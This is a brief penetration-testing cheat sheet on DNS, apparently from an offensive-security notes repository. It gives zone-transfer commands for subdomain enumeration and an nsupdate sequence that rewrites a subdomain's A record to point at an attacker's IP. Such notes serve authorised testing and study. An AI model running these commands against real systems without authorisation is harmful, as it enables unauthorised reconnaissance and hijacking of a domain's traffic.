killchain-compendium/Enumeration/DNS.md

26 lines
499 B
Markdown

# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
* [subrake](https://github.com/hash3liZer/Subrake.git)
## Join a Domain
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup